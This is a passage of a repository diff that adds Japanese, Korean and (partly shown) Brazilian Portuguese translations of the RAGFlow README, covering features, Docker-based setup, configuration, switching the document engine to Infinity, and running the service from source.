+ > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
185
+
186
+ 5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
187
+ > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
188
+ 6. [service_conf.yaml.template](./docker/service_conf.yaml.template) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
189
+
190
+ > 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
191
+
192
+ _これで初期設定完了!ショーの開幕です!_
193
+
194
+ ## 🔧 コンフィグ
195
+
196
+ システムコンフィグに関しては、以下のファイルを管理する必要がある:
197
+
198
+ - [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
199
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): バックエンドのサービスを設定します。
200
+ - [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
201
+
202
+ [.env](./docker/.env) ファイルの変更が [service_conf.yaml.template](./docker/service_conf.yaml.template) ファイルの内容と一致していることを確認する必要があります。
203
+
204
+ > [./docker/README](./docker/README.md) ファイルには、service_conf.yaml.template ファイルで ${ENV_VARS} として使用できる環境設定とサービス構成の詳細な説明が含まれています。
205
+
206
+ デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
207
+
208
+ > すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
209
+ >
210
+ > ```bash
211
+ > $ docker compose -f docker/docker-compose.yml up -d
212
+ > ```
213
+
214
+ ### Elasticsearch から Infinity にドキュメントエンジンを切り替えます
215
+
216
+ RAGFlow はデフォルトで Elasticsearch を使用して全文とベクトルを保存します。[Infinity](https://github.com/infiniflow/infinity/) に切り替えるには、次の手順に従います。
217
+
218
+ 1. 実行中のすべてのコンテナを停止するには:
219
+ ```bash
220
+ $ docker compose -f docker/docker-compose.yml down -v
221
+ ```
222
+ 2. **docker/.env** の「DOC_ENGINE」を「infinity」に設定します。
223
+
224
+ 3. 起動コンテナ:
225
+ ```bash
226
+ $ docker compose -f docker/docker-compose.yml up -d
227
+ ```
228
+ > [!WARNING]
229
+ > Linux/arm64 マシンでの Infinity への切り替えは正式にサポートされていません。
230
+
231
+ ## 🔧 ソースコードで Docker イメージを作成(埋め込みモデルなし)
232
+
233
+ この Docker イメージのサイズは約 2GB で、外部の大モデルと埋め込みサービスに依存しています。
234
+
235
+ ```bash
236
+ git clone https://github.com/infiniflow/ragflow.git
237
+ cd ragflow/
238
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
239
+ ```
240
+
241
+ ## 🔧 ソースコードをコンパイルした Docker イメージ(埋め込みモデルを含む)
242
+
243
+ この Docker のサイズは約 9GB で、埋め込みモデルを含むため、外部の大モデルサービスのみが必要です。
244
+
245
+ ```bash
246
+ git clone https://github.com/infiniflow/ragflow.git
247
+ cd ragflow/
248
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
249
+ ```
250
+
251
+ ## 🔨 ソースコードからサービスを起動する方法
252
+
253
+ 1. uv をインストールする。すでにインストールされている場合は、このステップをスキップしてください:
254
+
255
+ ```bash
256
+ pipx install uv
257
+ ```
258
+
259
+ 2. ソースコードをクローンし、Python の依存関係をインストールする:
260
+
261
+ ```bash
262
+ git clone https://github.com/infiniflow/ragflow.git
263
+ cd ragflow/
264
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
265
+ ```
266
+
267
+ 3. Docker Compose を使用して依存サービス(MinIO、Elasticsearch、Redis、MySQL)を起動する:
268
+
269
+ ```bash
270
+ docker compose -f docker/docker-compose-base.yml up -d
271
+ ```
272
+
273
+ `/etc/hosts` に以下の行を追加して、**conf/service_conf.yaml** に指定されたすべてのホストを `127.0.0.1` に解決します:
274
+
275
+ ```
276
+ 127.0.0.1 es01 infinity mysql minio redis
277
+ ```
278
+
279
+ 4. HuggingFace にアクセスできない場合は、`HF_ENDPOINT` 環境変数を設定してミラーサイトを使用してください:
280
+
281
+ ```bash
282
+ export HF_ENDPOINT=https://hf-mirror.com
283
+ ```
284
+
285
+ 5. バックエンドサービスを起動する:
286
+
287
+ ```bash
288
+ source .venv/bin/activate
289
+ export PYTHONPATH=$(pwd)
290
+ bash docker/launch_backend_service.sh
291
+ ```
292
+
293
+ 6. フロントエンドの依存関係をインストールする:
294
+ ```bash
295
+ cd web
296
+ npm install
297
+ ```
298
+ 7. フロントエンドサービスを起動する:
299
+
300
+ ```bash
301
+ npm run dev
302
+ ```
303
+
304
+ _以下の画面で、システムが正常に起動したことを示します:_
305
+
306
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
307
+
308
+ ## 📚 ドキュメンテーション
309
+
310
+ - [Quickstart](https://ragflow.io/docs/dev/)
311
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
312
+ - [References](https://ragflow.io/docs/dev/category/references)
313
+ - [FAQ](https://ragflow.io/docs/dev/faq)
314
+
315
+ ## 📜 ロードマップ
316
+
317
+ [RAGFlow ロードマップ 2025](https://github.com/infiniflow/ragflow/issues/4214) を参照
318
+
319
+ ## 🏄 コミュニティ
320
+
321
+ - [Discord](https://discord.gg/4XxujFgUN7)
322
+ - [Twitter](https://twitter.com/infiniflowai)
323
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
324
+
325
+ ## 🙌 コントリビュート
326
+
327
+ RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。参加を希望される方は、まず [コントリビューションガイド](./CONTRIBUTING.md)をご覧ください。
ragflow-main/README_ko.md ADDED
@@ -0,0 +1,327 @@
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow란?
44
+
45
+ [RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
46
+
47
+ ## 🎮 데모
48
+
49
+ 데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 업데이트
57
+
58
+ - 2025-02-05 'SILICONFLOW' 모델 목록을 업데이트하고 Deepseek-R1/DeepSeek-V3에 대한 지원을 추가합니다.
59
+ - 2025-01-26 지식 그래프 추출 및 적용을 최적화하고 다양한 구성 옵션을 제공합니다.
60
+ - 2024-12-18 Deepdoc의 문서 레이아웃 분석 모델 업그레이드.
61
+ - 2024-12-04 지식베이스에 대한 페이지랭크 점수를 지원합니다.
62
+
63
+ - 2024-11-22 에이전트의 변수 정의 및 사용을 개선했습니다.
64
+ - 2024-11-01 파싱된 청크에 키워드 추출 및 관련 질문 생성을 추가하여 재현율을 향상시킵니다.
65
+ - 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
66
+
67
+ ## 🎉 계속 지켜봐 주세요
68
+
69
+ ⭐️우리의 저장소를 즐겨찾기에 등록하여 흥미로운 새로운 기능과 업데이트를 최신 상태로 유지하세요! 모든 새로운 릴리스에 대한 즉시 알림을 받으세요! 🌟
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
73
+ </div>
74
+
75
+ ## 🌟 주요 기능
76
+
77
+ ### 🍭 **"Quality in, quality out"**
78
+
79
+ - [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
80
+ - 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
81
+
82
+ ### 🍱 **템플릿 기반의 chunking**
83
+
84
+ - 똑똑하고 설명 가능한 방식.
85
+ - 다양한 템플릿 옵션을 제공합니다.
86
+
87
+ ### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
88
+
89
+ - 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
90
+ - 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
91
+
92
+ ### 🍔 **다른 종류의 데이터 소스와의 호환성**
93
+
94
+ - 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
95
+
96
+ ### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
97
+
98
+ - 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
99
+ - 구성 가능한 LLM 및 임베딩 모델.
100
+ - 다중 검색과 결합된 re-ranking.
101
+ - 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
102
+
103
+ ## 🔎 시스템 아키텍처
104
+
105
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
106
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
107
+ </div>
108
+
109
+ ## 🎬 시작하기
110
+
111
+ ### 📝 사전 준비 사항
112
+
113
+ - CPU >= 4 cores
114
+ - RAM >= 16 GB
115
+ - Disk >= 50 GB
116
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
117
+ > 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.
118
+
119
+ ### 🚀 서버 시작하기
120
+
121
+ 1. `vm.max_map_count`가 262144 이상인지 확인하세요:
122
+
123
+ > `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
124
+ >
125
+ > ```bash
126
+ > $ sysctl vm.max_map_count
127
+ > ```
128
+ >
129
+ > 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 재설정하세요.
130
+ >
131
+ > ```bash
132
+ > # 이 경우에 262144로 설정했습니다.:
133
+ > $ sudo sysctl -w vm.max_map_count=262144
134
+ > ```
135
+ >
136
+ > 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
137
+ >
138
+ > ```bash
139
+ > vm.max_map_count=262144
140
+ > ```
141
+
142
+ 2. 레포지토리를 클론하세요:
143
+
144
+ ```bash
145
+ $ git clone https://github.com/infiniflow/ragflow.git
146
+ ```
147
+
148
+ 3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
149
+
150
+ > 아래 명령어는 RAGFlow Docker 이미지의 v0.16.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.16.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.16.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0로 설정합니다.
151
+
152
+ ```bash
153
+ $ cd ragflow
154
+ $ docker compose -f docker/docker-compose.yml up -d
155
+ ```
156
+
157
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
158
+ | ----------------- | --------------- | --------------------- | ------------------------ |
159
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
160
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
161
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
162
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
163
+
164
+ 4. 서버가 시작된 후 서버 상태를 확인하세요:
165
+
166
+ ```bash
167
+ $ docker logs -f ragflow-server
168
+ ```
169
+
170
+ _다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
171
+
172
+ ```bash
173
+ ____ ___ ______ ______ __
174
+ / __ \ / | / ____// ____// /____ _ __
175
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
176
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
177
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
178
+
179
+ * Running on all addresses (0.0.0.0)
180
+ * Running on http://127.0.0.1:9380
181
+ * Running on http://x.x.x.x:9380
182
+ INFO:werkzeug:Press CTRL+C to quit
183
+ ```
184
+
185
+ > 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network anormal` 오류가 발생할 수 있습니다.
186
+
187
+ 5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
188
+ > 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
189
+ 6. [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
190
+
191
+ > 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
192
+
193
+ _이제 쇼가 시작됩니다!_
194
+
195
+ ## 🔧 설정
196
+
197
+ 시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
198
+
199
+ - [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
200
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): 백엔드 서비스를 구성합니다.
201
+ - [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
202
+
203
+ [.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일의 내용과 일치하도록 해야 합니다.
204
+
205
+ > [./docker/README](./docker/README.md) 파일은 service_conf.yaml.template 파일에서 ${ENV_VARS}로 사용할 수 있는 환경 설정과 서비스 구성에 대한 자세한 설명을 제공합니다.
206
+
207
+ 기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
208
+
209
+ > 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
210
+ >
211
+ > ```bash
212
+ > $ docker compose -f docker/docker-compose.yml up -d
213
+ > ```
214
+
215
+ ### Elasticsearch 에서 Infinity 로 문서 엔진 전환
216
+
217
+ RAGFlow 는 기본적으로 Elasticsearch 를 사용하여 전체 텍스트 및 벡터를 저장합니다. [Infinity](https://github.com/infiniflow/infinity/)로 전환하려면 다음 절차를 따르십시오.
218
+
219
+ 1. 실행 중인 모든 컨테이너를 중지합니다.
220
+ ```bash
221
+ $ docker compose -f docker/docker-compose.yml down -v
222
+ ```
223
+ 2. **docker/.env**의 "DOC_ENGINE" 을 "infinity" 로 설정합니다.
224
+ 3. 컨테이너 부팅:
225
+ ```bash
226
+ $ docker compose -f docker/docker-compose.yml up -d
227
+ ```
228
+ > [!WARNING]
229
+ > Linux/arm64 시스템에서 Infinity로 전환하는 것은 공식적으로 지원되지 않습니다.
230
+
231
+ ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함하지 않음)
232
+
233
+ 이 Docker 이미지의 크기는 약 2GB이며, 외부 대형 모델과 임베딩 서비스에 의존합니다.
234
+
235
+ ```bash
236
+ git clone https://github.com/infiniflow/ragflow.git
237
+ cd ragflow/
238
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
239
+ ```
240
+
241
+ ## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함)
242
+
243
+ 이 Docker의 크기는 약 9GB이며, 이미 임베딩 모델을 포함하고 있으므로 외부 대형 모델 서비스에만 의존하면 됩니다.
244
+
245
+ ```bash
246
+ git clone https://github.com/infiniflow/ragflow.git
247
+ cd ragflow/
248
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
249
+ ```
250
+
251
+ ## 🔨 소스 코드로 서비스를 시작합니다.
252
+
253
+ 1. uv를 설치하거나 이미 설치된 경우 이 단계를 건너뜁니다:
254
+
255
+ ```bash
256
+ pipx install uv
257
+ ```
258
+
259
+ 2. 소스 코드를 클론하고 Python 의존성을 설치합니다:
260
+
261
+ ```bash
262
+ git clone https://github.com/infiniflow/ragflow.git
263
+ cd ragflow/
264
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
265
+ ```
266
+
267
+ 3. Docker Compose를 사용하여 의존 서비스(MinIO, Elasticsearch, Redis 및 MySQL)를 시작합니다:
268
+
269
+ ```bash
270
+ docker compose -f docker/docker-compose-base.yml up -d
271
+ ```
272
+
273
+ `/etc/hosts` 에 다음 줄을 추가하여 **conf/service_conf.yaml** 에 지정된 모든 호스트를 `127.0.0.1` 로 해결합니다:
274
+
275
+ ```
276
+ 127.0.0.1 es01 infinity mysql minio redis
277
+ ```
278
+
279
+ 4. HuggingFace에 접근할 수 없는 경우, `HF_ENDPOINT` 환경 변수를 설정하여 미러 사이트를 사용하세요:
280
+
281
+ ```bash
282
+ export HF_ENDPOINT=https://hf-mirror.com
283
+ ```
284
+
285
+ 5. 백엔드 서비스를 시작합니다:
286
+
287
+ ```bash
288
+ source .venv/bin/activate
289
+ export PYTHONPATH=$(pwd)
290
+ bash docker/launch_backend_service.sh
291
+ ```
292
+
293
+ 6. 프론트엔드 의존성을 설치합니다:
294
+ ```bash
295
+ cd web
296
+ npm install
297
+ ```
298
+ 7. 프론트엔드 서비스를 시작합니다:
299
+
300
+ ```bash
301
+ npm run dev
302
+ ```
303
+
304
+ _다음 인터페이스는 시스템이 성공적으로 시작되었음을 나타냅니다:_
305
+
306
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
307
+
308
+ ## 📚 문서
309
+
310
+ - [Quickstart](https://ragflow.io/docs/dev/)
311
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
312
+ - [References](https://ragflow.io/docs/dev/category/references)
313
+ - [FAQ](https://ragflow.io/docs/dev/faq)
314
+
315
+ ## 📜 로드맵
316
+
317
+ [RAGFlow 로드맵 2025](https://github.com/infiniflow/ragflow/issues/4214)을 확인하세요.
318
+
319
+ ## 🏄 커뮤니티
320
+
321
+ - [Discord](https://discord.gg/4XxujFgUN7)
322
+ - [Twitter](https://twitter.com/infiniflowai)
323
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
324
+
325
+ ## 🙌 컨트리뷰션
326
+
327
+ RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./CONTRIBUTING.md)을 검토해 주세요.
ragflow-main/README_pt_br.md ADDED
@@ -0,0 +1,354 @@
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="seguir no X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Badge Estático" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Última%20Relese" alt="Última Versão">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="licença">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Documentação</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary><b>📕 Índice</b></summary>
45
+
46
+ - 💡 [O que é o RAGFlow?](#-o-que-é-o-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Últimas Atualizações](#-últimas-atualizações)
49
+ - 🌟 [Principais Funcionalidades](#-principais-funcionalidades)
50
+ - 🔎 [Arquitetura do Sistema](#-arquitetura-do-sistema)
51
+ - 🎬 [Primeiros Passos](#-primeiros-passos)
52
+ - 🔧 [Configurações](#-configurações)
53
+ - 🔧 [Construir uma imagem docker sem incorporar modelos](#-construir-uma-imagem-docker-sem-incorporar-modelos)
54
+ - 🔧 [Construir uma imagem docker incluindo modelos](#-construir-uma-imagem-docker-incluindo-modelos)
55
+ - 🔨 [Lançar serviço a partir do código-fonte para desenvolvimento](#-lançar-serviço-a-partir-do-código-fonte-para-desenvolvimento)
56
+ - 📚 [Documentação](#-documentação)
57
+ - 📜 [Roadmap](#-roadmap)
58
+ - 🏄 [Comunidade](#-comunidade)
59
+ - 🙌 [Contribuindo](#-contribuindo)
60
+
61
+ </details>
62
+
63
+ ## 💡 O que é o RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) é um mecanismo RAG (Geração Aumentada por Recuperação) de código aberto baseado em entendimento profundo de documentos. Ele oferece um fluxo de trabalho RAG simplificado para empresas de qualquer porte, combinando LLMs (Modelos de Linguagem de Grande Escala) para fornecer capacidades de perguntas e respostas verídicas, respaldadas por citações bem fundamentadas de diversos dados complexos formatados.
66
+
67
+ ## 🎮 Demo
68
+
69
+ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
73
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
74
+ </div>
75
+
76
+ ## 🔥 Últimas Atualizações
77
+
78
+ - 05-02-2025 Atualiza a lista de modelos de 'SILICONFLOW' e adiciona suporte para Deepseek-R1/DeepSeek-V3.
79
+ - 26-01-2025 Otimize a extração e aplicação de gráficos de conhecimento e forneça uma variedade de opções de configuração.
80
+ - 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no Deepdoc.
81
+ - 04-12-2024 Adiciona suporte para pontuação de pagerank na base de conhecimento.
82
+ - 22-11-2024 Adiciona mais variáveis para o Agente.
83
+ - 01-11-2024 Adiciona extração de palavras-chave e geração de perguntas relacionadas aos blocos analisados para melhorar a precisão da recuperação.
84
+ - 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
85
+
86
+ ## 🎉 Fique Ligado
87
+
88
+ ⭐️ Dê uma estrela no nosso repositório para se manter atualizado com novas funcionalidades e melhorias empolgantes! Receba notificações instantâneas sobre novos lançamentos! 🌟
89
+
90
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
91
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
92
+ </div>
93
+
94
+ ## 🌟 Principais Funcionalidades
95
+
96
+ ### 🍭 **"Qualidade entra, qualidade sai"**
97
+
98
+ - Extração de conhecimento baseada em [entendimento profundo de documentos](./deepdoc/README.md) a partir de dados não estruturados com formatos complicados.
99
+ - Encontra a "agulha no palheiro de dados" de literalmente tokens ilimitados.
100
+
101
+ ### 🍱 **Fragmentação baseada em templates**
102
+
103
+ - Inteligente e explicável.
104
+ - Muitas opções de templates para escolher.
105
+
106
+ ### 🌱 **Citações fundamentadas com menos alucinações**
107
+
108
+ - Visualização da fragmentação de texto para permitir intervenção humana.
109
+ - Visualização rápida das referências chave e citações rastreáveis para apoiar respostas fundamentadas.
110
+
111
+ ### 🍔 **Compatibilidade com fontes de dados heterogêneas**
112
+
113
+ - Suporta Word, apresentações, excel, txt, imagens, cópias digitalizadas, dados estruturados, páginas da web e mais.
114
+
115
+ ### 🛀 **Fluxo de trabalho RAG automatizado e sem esforço**
116
+
117
+ - Orquestração RAG simplificada voltada tanto para negócios pessoais quanto grandes empresas.
118
+ - Modelos LLM e de incorporação configuráveis.
119
+ - Múltiplas recuperações emparelhadas com reclassificação fundida.
120
+ - APIs intuitivas para integração sem problemas com os negócios.
121
+
122
+ ## 🔎 Arquitetura do Sistema
123
+
124
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
125
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
126
+ </div>
127
+
128
+ ## 🎬 Primeiros Passos
129
+
130
+ ### 📝 Pré-requisitos
131
+
132
+ - CPU >= 4 núcleos
133
+ - RAM >= 16 GB
134
+ - Disco >= 50 GB
135
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
136
+ > Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
137
+
138
+ ### 🚀 Iniciar o servidor
139
+
140
+ 1. Certifique-se de que `vm.max_map_count` >= 262144:
141
+
142
+ > Para verificar o valor de `vm.max_map_count`:
143
+ >
144
+ > ```bash
145
+ > $ sysctl vm.max_map_count
146
+ > ```
147
+ >
148
+ > Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
149
+ >
150
+ > ```bash
151
+ > # Neste caso, defina para 262144:
152
+ > $ sudo sysctl -w vm.max_map_count=262144
153
+ > ```
154
+ >
155
+ > Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
156
+ >
157
+ > ```bash
158
